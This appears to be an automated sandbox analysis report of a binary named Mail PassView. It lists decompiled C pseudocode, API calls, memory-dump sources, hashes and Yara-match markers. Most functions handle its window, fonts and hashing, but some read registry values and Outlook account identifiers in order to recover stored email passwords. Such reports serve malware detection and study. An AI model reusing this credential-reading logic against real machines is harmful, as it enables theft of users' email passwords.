                                                  				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
                                                  				_v44.lpszClassName = __esi + 4;
                                                  				_v44.style = 0;
                                                  				_v44.lpfnWndProc = E004017C1;
                                                  				_v44.cbClsExtra = 0;
                                                  				_v44.cbWndExtra = 0;
                                                  				_v44.hCursor = 0;
                                                  				_v44.hbrBackground = 0x10;
                                                  				_v44.lpszMenuName = 0;
                                                  				RegisterClassA( &_v44);
                                                  				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
                                                  				 *(__esi + 0x108) = _t20;
                                                  				return _t20;
                                                  			}
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: ClassCreateRegisterWindow
                                                  • String ID: Mail PassView$MailPassView
                                                  • API String ID: 3469048531-1277648965
                                                  C-Code - Quality: 100%
                                                  			E00401085(void* __esi, void* __eflags) {
                                                  				struct tagLOGFONTA _v64;
                                                  				int _t10;
                                                  				long _t11;
                                                  
                                                  				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
                                                  				_t10 = CreateFontIndirectA( &_v64);
                                                  				 *(__esi + 0x20c) = _t10;
                                                  				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
                                                  				if( *0x417388 != 0) {
                                                  					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
                                                  				}
                                                  				return _t11;
                                                  			}
                                                  APIs
                                                    • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                    • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                  • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 4251605573-168460110
                                                  C-Code - Quality: 100%
                                                  			E0040DE43(void** __eax, struct HWND__* _a4) {
                                                  				int _t6;
                                                  				void** _t10;
                                                  
                                                  				_t10 = __eax;
                                                  				if( *0x417510 == 0) {
                                                  					memcpy(0x416e70,  *__eax, 0x50);
                                                  					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
                                                  					 *0x417510 = 1;
                                                  					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
                                                  					 *0x417510 =  *0x417510 & 0x00000000;
                                                  					 *0x416b9c = _t6;
                                                  					return 1;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: memcpy$DialogParam
                                                  • String ID: V7
                                                  • API String ID: 392721444-2959985473
                                                  C-Code - Quality: 58%
                                                  			E004062D1(struct HWND__* _a4) {
                                                  				void _v259;
                                                  				char _v260;
                                                  				signed int _t10;
                                                  
                                                  				_v260 = 0;
                                                  				memset( &_v259, 0, 0xff);
                                                  				GetClassNameA(_a4,  &_v260, 0xff);
                                                  				_t10 =  &_v260;
                                                  				_push("edit");
                                                  				_push(_t10);
                                                  				L004115B2();
                                                  				asm("sbb eax, eax");
                                                  				return  ~_t10 + 1;
                                                  			}
                                                  APIs
                                                  • memset.MSVCRT ref: 004062F1
                                                  • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                  • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: ClassName_stricmpmemset
                                                  • String ID: edit
                                                  • API String ID: 3665161774-2167791130
                                                  C-Code - Quality: 100%
                                                  			E0040EDAC() {
                                                  				struct HINSTANCE__* _t1;
                                                  				_Unknown_base(*)()* _t2;
                                                  
                                                  				if( *0x417520 == 0) {
                                                  					_t1 = LoadLibraryA("shell32.dll");
                                                  					 *0x417520 = _t1;
                                                  					if(_t1 != 0) {
                                                  						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
                                                  						 *0x41751c = _t2;
                                                  						return _t2;
                                                  					}
                                                  				}
                                                  				return _t1;
                                                  			}
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74B04DE0,?,00000000), ref: 0040EDBA
                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                  • API String ID: 2574300362-543337301
                                                  C-Code - Quality: 87%
                                                  			E0040FE05(intOrPtr* __esi, void* __eflags) {
                                                  				void* _t27;
                                                  				intOrPtr _t28;
                                                  				intOrPtr* _t29;
                                                  				intOrPtr* _t44;
                                                  
                                                  				_t44 = __esi;
                                                  				 *__esi = 0x414288;
                                                  				_t27 = E00406549(0x46c, __esi);
                                                  				_push(0x20);
                                                  				L004115D0();
                                                  				if(_t27 == 0) {
                                                  					_t28 = 0;
                                                  				} else {
                                                  					_t28 = E00406A2C(_t27);
                                                  				}
                                                  				_push(0x20);
                                                  				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
                                                  				L004115D0();
                                                  				if(_t28 == 0) {
                                                  					_t29 = 0;
                                                  				} else {
                                                  					_t29 = E00406A2C(_t28);
                                                  				}
                                                  				_push(0x14);
                                                  				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
                                                  				L004115D0();
                                                  				if(_t29 == 0) {
                                                  					_t29 = 0;
                                                  				} else {
                                                  					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                  					 *_t29 = 0;
                                                  					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                  					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                  					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                  				}
                                                  				_push(0x14);
                                                  				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
                                                  				L004115D0();
                                                  				if(_t29 == 0) {
                                                  					_t29 = 0;
                                                  				} else {
                                                  					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                  					 *_t29 = 0;
                                                  					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                  					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                  					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                  				}
                                                  				_push(0x14);
                                                  				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
                                                  				L004115D0();
                                                  				if(_t29 == 0) {
                                                  					_t29 = 0;
                                                  				} else {
                                                  					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                  					 *_t29 = 0;
                                                  					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                  					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                  					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                  				}
                                                  				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
                                                  				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
                                                  				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
                                                  				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
                                                  				 *((intOrPtr*)(_t44 + 0x40)) = 1;
                                                  				 *((intOrPtr*)(_t44 + 0x44)) = 1;
                                                  				 *((intOrPtr*)(_t44 + 0x48)) = 1;
                                                  				return _t44;
                                                  			}

                                                  0x0040fe05
                                                  0x0040fe0d
                                                  0x0040fe13
                                                  0x0040fe18
                                                  0x0040fe1a
                                                  0x0040fe25
                                                  0x0040fe2e
                                                  0x0040fe27
                                                  0x0040fe27
                                                  0x0040fe27
                                                  0x0040fe30
                                                  0x0040fe32
                                                  0x0040fe38
                                                  0x0040fe40
                                                  0x0040fe49
                                                  0x0040fe42
                                                  0x0040fe42
                                                  0x0040fe42
                                                  0x0040fe4b
                                                  0x0040fe4d
                                                  0x0040fe53
                                                  0x0040fe60
                                                  0x0040fe72
                                                  0x0040fe62
                                                  0x0040fe62
                                                  0x0040fe65
                                                  0x0040fe67
                                                  0x0040fe6a
                                                  0x0040fe6d
                                                  0x0040fe6d
                                                  0x0040fe74
                                                  0x0040fe76
                                                  0x0040fe7c
                                                  0x0040fe84
                                                  0x0040fe96
                                                  0x0040fe86
                                                  0x0040fe86
                                                  0x0040fe89
                                                  0x0040fe8b
                                                  0x0040fe8e
                                                  0x0040fe91
                                                  0x0040fe91
                                                  0x0040fe98
                                                  0x0040fe9a
                                                  0x0040fea0
                                                  0x0040fea8
                                                  0x0040feba
                                                  0x0040feaa
                                                  0x0040feaa
                                                  0x0040fead
                                                  0x0040feaf
                                                  0x0040feb2
                                                  0x0040feb5
                                                  0x0040feb5
                                                  0x0040fec2
                                                  0x0040fecd
                                                  0x0040fed6
                                                  0x0040fedd
                                                  0x0040fee0
                                                  0x0040fee3
                                                  0x0040fee6
                                                  0x0040feec

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                  • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                  • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                  • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040BD0B(void* __edi, void* __esi, void* _a4) {
                                                  				signed int _t13;
                                                  				signed int _t25;
                                                  				int _t26;
                                                  				char* _t30;
                                                  				void* _t31;
                                                  				void* _t33;
                                                  				void* _t35;
                                                  
                                                  				_t35 = __esi;
                                                  				_t25 = 0x3f;
                                                  				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
                                                  				_t30 = __esi + 0x18 + _t13;
                                                  				 *_t30 = 0x80;
                                                  				_t26 = _t25 - _t13;
                                                  				_t31 = _t30 + 1;
                                                  				if(_t26 >= 8) {
                                                  					memset(_t31, 0, _t26 + 0xfffffff8);
                                                  				} else {
                                                  					memset(_t31, 0, _t26);
                                                  					_t33 = __esi + 0x18;
                                                  					E0040BD8A(_t33, __esi);
                                                  					memset(_t33, 0, 0x38);
                                                  				}
                                                  				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
                                                  				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
                                                  				E0040BD8A(_t35 + 0x18, _t35);
                                                  				memcpy(_a4, _t35, 0x10);
                                                  				return memset(_t35, 0, 4);
                                                  			}

                                                  0x0040bd0b
                                                  0x0040bd13
                                                  0x0040bd14
                                                  0x0040bd16
                                                  0x0040bd1a
                                                  0x0040bd1d
                                                  0x0040bd1f
                                                  0x0040bd23
                                                  0x0040bd52
                                                  0x0040bd25
                                                  0x0040bd2a
                                                  0x0040bd2f
                                                  0x0040bd36
                                                  0x0040bd40
                                                  0x0040bd48
                                                  0x0040bd5d
                                                  0x0040bd63
                                                  0x0040bd6b
                                                  0x0040bd77
                                                  0x0040bd89

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  • API String ID: 368790112-0
                                                  • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                  • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                  • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                  • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                  				void _v2058;
                                                  				char _v2060;
                                                  				char _v2069;
                                                  				char _v2070;
                                                  				char _v2071;
                                                  				char _v2072;
                                                  				char _v3086;
                                                  				signed char _v3090;
                                                  				char _v3091;
                                                  				char _v3092;
                                                  				char* _v3096;
                                                  				char _v3100;
                                                  				short* _v3104;
                                                  				int _v3108;
                                                  				char _v3112;
                                                  				void* __ebx;
                                                  				void* _t49;
                                                  				signed int _t61;
                                                  				short* _t76;
                                                  				void* _t83;
                                                  				signed int _t87;
                                                  				void* _t90;
                                                  
                                                  				_t83 = __eax;
                                                  				_t73 = 0;
                                                  				 *_a12 = 0;
                                                  				_v3112 = 0x400;
                                                  				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
                                                  				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
                                                  				if(_t49 == 0) {
                                                  					_v2069 = 0;
                                                  					_v2070 = 0;
                                                  					_v2071 = 0;
                                                  					_v2072 = 0;
                                                  					if(_v3092 != 1) {
                                                  						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
                                                  							_v3100 = _v3112 - 1;
                                                  							_v3096 =  &_v3091;
                                                  							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
                                                  								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
                                                  								LocalFree(_v3104);
                                                  							}
                                                  						}
                                                  					} else {
                                                  						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
                                                  							if(_a16 == 0) {
                                                  								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
                                                  							} else {
                                                  								_v2060 = 0;
                                                  								memset( &_v2058, 0, 0x800);
                                                  								_t90 = _t90 + 0xc;
                                                  								_t76 =  &_v2060;
                                                  								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
                                                  								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
                                                  							}
                                                  							_t73 = 0;
                                                  						}
                                                  						_t79 = _a12;
                                                  						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
                                                  							_t61 = _v3090 & 0x000000ff;
                                                  							if(_t61 > 1 && _v3112 >= _t61 + 6) {
                                                  								E00401DFD(_t79,  &_v3086, _t61);
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return 0 |  *_a12 != _t73;
                                                  			}

                                                  0x0040247a
                                                  0x0040247f
                                                  0x00402481
                                                  0x00402490
                                                  0x0040249b
                                                  0x004024a0
                                                  0x004024a5
                                                  0x004024b0
                                                  0x004024b7
                                                  0x004024be
                                                  0x004024c5
                                                  0x004024cc
                                                  0x0040259e
                                                  0x004025ad
                                                  0x004025b5
                                                  0x004025d1
                                                  0x004025e4
                                                  0x004025ee
                                                  0x004025ee
                                                  0x004025d1
                                                  0x004024d2
                                                  0x004024d8
                                                  0x004024dd
                                                  0x00402546
                                                  0x004024df
                                                  0x004024ed
                                                  0x004024f5
                                                  0x004024fa
                                                  0x00402510
                                                  0x00402517
                                                  0x0040252c
                                                  0x0040252c
                                                  0x0040254b
                                                  0x0040254b
                                                  0x0040254d
                                                  0x00402552
                                                  0x00402575
                                                  0x0040257d
                                                  0x0040258f
                                                  0x00402594
                                                  0x0040257d
                                                  0x00402552
                                                  0x004024cc
                                                  0x00402603

                                                  APIs
                                                    • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                  • memset.MSVCRT ref: 004024F5
                                                    • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                    • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                    • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                    • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                  • LocalFree.KERNEL32(?), ref: 004025EE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                  • String ID:
                                                  • API String ID: 3503910906-0
                                                  • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                  • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                  • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                  • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                  				intOrPtr _v8;
                                                  				void _v263;
                                                  				char _v264;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t42;
                                                  				signed int _t45;
                                                  				intOrPtr* _t60;
                                                  				signed char _t62;
                                                  				intOrPtr _t63;
                                                  				int _t65;
                                                  
                                                  				_t61 = __ecx;
                                                  				_t60 = _a8;
                                                  				_t63 = __ecx;
                                                  				_v8 = __ecx;
                                                  				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
                                                  					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
                                                  					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
                                                  					 *(_t63 + 0x110) = _t42;
                                                  				}
                                                  				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
                                                  					_v264 = 0;
                                                  					memset( &_v263, 0, 0xff);
                                                  					E00401000(_t61,  &_v264, 0x412440);
                                                  					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
                                                  					_t63 = _v8;
                                                  				}
                                                  				_t65 = 0;
                                                  				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
                                                  					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
                                                  					if( *_t60 == _t42) {
                                                  						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
                                                  						 *((intOrPtr*)(_t60 + 0x60)) = 0;
                                                  					}
                                                  				}
                                                  				if(_a4 != 0x103) {
                                                  					L27:
                                                  					return _t42;
                                                  				} else {
                                                  					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
                                                  					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
                                                  						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
                                                  						_t65 = 0;
                                                  					}
                                                  					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
                                                  						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
                                                  						_t65 = 0;
                                                  					}
                                                  					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
                                                  						goto L27;
                                                  					} else {
                                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
                                                  							_t62 = 2;
                                                  							_t45 =  *(_t60 + 0x14) & _t62;
                                                  							__eflags = _t45;
                                                  							if(_t45 == 0) {
                                                  								L20:
                                                  								__eflags = _t45 - _t62;
                                                  								if(_t45 == _t62) {
                                                  									L23:
                                                  									_t42 = 0;
                                                  									__eflags = 0;
                                                  									L24:
                                                  									if(_t42 == _t65) {
                                                  										goto L27;
                                                  									}
                                                  									_t42 = _t63 + 0x25c;
                                                  									if( *_t42 != _t65) {
                                                  										goto L27;
                                                  									}
                                                  									 *_t42 = 1;
                                                  									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
                                                  								}
                                                  								__eflags =  *(_t60 + 0x18) & _t62;
                                                  								if(( *(_t60 + 0x18) & _t62) == 0) {
                                                  									goto L23;
                                                  								}
                                                  								L22:
                                                  								_t42 = 1;
                                                  								goto L24;
                                                  							}
                                                  							__eflags =  *(_t60 + 0x18) & _t62;
                                                  							if(( *(_t60 + 0x18) & _t62) == 0) {
                                                  								goto L22;
                                                  							}
                                                  							goto L20;
                                                  						}
                                                  						asm("sbb eax, eax");
                                                  						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
                                                  						goto L24;
                                                  					}
                                                  				}
                                                  			}

                                                  0x0040b3c4
                                                  0x0040b3ce
                                                  0x0040b3da
                                                  0x0040b3dc
                                                  0x0040b3df
                                                  0x0040b3ef
                                                  0x0040b3f4
                                                  0x0040b3fe
                                                  0x0040b3fe
                                                  0x0040b40b
                                                  0x0040b427
                                                  0x0040b42e
                                                  0x0040b43e
                                                  0x0040b44f
                                                  0x0040b454
                                                  0x0040b457
                                                  0x0040b45a
                                                  0x0040b463

                                                  APIs
                                                  • memset.MSVCRT ref: 0040B42E
                                                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040B472
                                                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                  • PostMessageA.USER32 ref: 0040B52F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: Message$MenuPostSendStringmemset
                                                  • String ID:
                                                  • API String ID: 3798638045-0
                                                  • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                  • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                  • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                  • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 94%
                                                  			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				void* __ebx;
                                                  				signed int _t63;
                                                  				intOrPtr _t67;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t74;
                                                  				signed int _t79;
                                                  				void* _t84;
                                                  				signed int _t86;
                                                  				char* _t98;
                                                  				void* _t100;
                                                  				void* _t102;
                                                  				void* _t104;
                                                  				void* _t106;
                                                  				void* _t107;
                                                  
                                                  				_t84 = __eax;
                                                  				E0040892D(__eax, __eflags);
                                                  				_t86 = 0;
                                                  				_v12 = 0;
                                                  				while(1) {
                                                  					_t98 = _a4;
                                                  					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                                  						break;
                                                  					}
                                                  					_t86 = _t86 + 1;
                                                  					if(_t86 < 1) {
                                                  						continue;
                                                  					}
                                                  					if(strlen(_t98) >= 3) {
                                                  						break;
                                                  					}
                                                  					_t79 = atoi(_a4);
                                                  					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                                  						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                  					}
                                                  					L21:
                                                  					if(_a8 != 0) {
                                                  						_v12 = _v12 | 0x00001000;
                                                  					}
                                                  					_t63 = _v12;
                                                  					 *0x41748c =  *0x41748c + 1;
                                                  					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
                                                  					return _t63;
                                                  				}
                                                  				_t104 = 0;
                                                  				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                  					L14:
                                                  					_t100 = 0;
                                                  					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                  					_v8 = 0;
                                                  					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                  						L20:
                                                  						goto L21;
                                                  					}
                                                  					_t106 = 0;
                                                  					__eflags = 0;
                                                  					do {
                                                  						_v20 = E004069D2(0, _a4);
                                                  						_t67 = E004069D2(0, _a4);
                                                  						__eflags = _v20;
                                                  						if(_v20 >= 0) {
                                                  							L18:
                                                  							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                  							goto L19;
                                                  						}
                                                  						__eflags = _t67;
                                                  						if(_t67 < 0) {
                                                  							goto L19;
                                                  						}
                                                  						goto L18;
                                                  						L19:
                                                  						_v8 = _v8 + 1;
                                                  						_t100 = _t100 + 0x10;
                                                  						_t106 = _t106 + 0x14;
                                                  						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                  					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                  					goto L20;
                                                  				}
                                                  				_t102 = 0;
                                                  				__eflags = 0;
                                                  				do {
                                                  					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                                  					_push(_a4);
                                                  					_push(_t72);
                                                  					L004115C4();
                                                  					_push(_a4);
                                                  					_v20 = _t72;
                                                  					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                                  					_push(_t74);
                                                  					L004115C4();
                                                  					_t107 = _t107 + 0x10;
                                                  					__eflags = _v20;
                                                  					if(_v20 == 0) {
                                                  						L11:
                                                  						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                                  						_v16 = 1;
                                                  						goto L12;
                                                  					}
                                                  					__eflags = _t74;
                                                  					if(_t74 != 0) {
                                                  						goto L12;
                                                  					}
                                                  					goto L11;
                                                  					L12:
                                                  					_v8 = _v8 + 1;
                                                  					_t102 = _t102 + 0x10;
                                                  					_t104 = _t104 + 0x14;
                                                  					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                  				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                  				__eflags = _v16;
                                                  				if(_v16 != 0) {
                                                  					goto L20;
                                                  				}
                                                  				goto L14;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                    • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                  • strlen.MSVCRT ref: 0040A13F
                                                  • atoi.MSVCRT ref: 0040A14D
                                                  • _mbsicmp.MSVCRT ref: 0040A1A0
                                                  • _mbsicmp.MSVCRT ref: 0040A1B3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: _mbsicmp$??2@??3@atoistrlen
                                                  • String ID:
                                                  • API String ID: 4107816708-0
